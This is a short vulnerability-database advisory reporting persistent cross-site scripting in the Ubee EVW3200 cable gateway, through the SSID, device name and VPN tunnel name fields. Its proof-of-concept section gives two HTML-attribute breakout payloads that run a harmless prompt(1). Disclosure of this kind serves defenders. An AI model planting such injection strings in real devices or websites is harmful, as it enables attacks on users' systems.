Ubee EVW3200 - Multiple Persistent Cross Site Scripting

2014-07-01T00:00:00
ID SSV:85536
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: Ubee EVW3200 - Multiple Persistent Cross Site Scripting

# Google Dork: N/A

# Date: 02-03-2014

# Exploit Author: Jeroen - IT Nerdbox

# Vendor Homepage: http://www.ubeeinteractive.com/

# Software Link:
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20

# Version: All

# Tested on: N/A

# CVE : N/A

#

## Description:

#

# The SSID and Device name settings in the wireless configuration do not
sanitize their input.

#

# The VPN Tunnel name is also vulnerable for persistent XSS

#

## PoC:

#

#   Entering the following payload in one of these fields will execute
javascript:

#

#  "><input onmouseover=prompt(1)>  or "><button
onclick=prompt(1)>XSS</button>

# 

#

# More information can be found at:
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/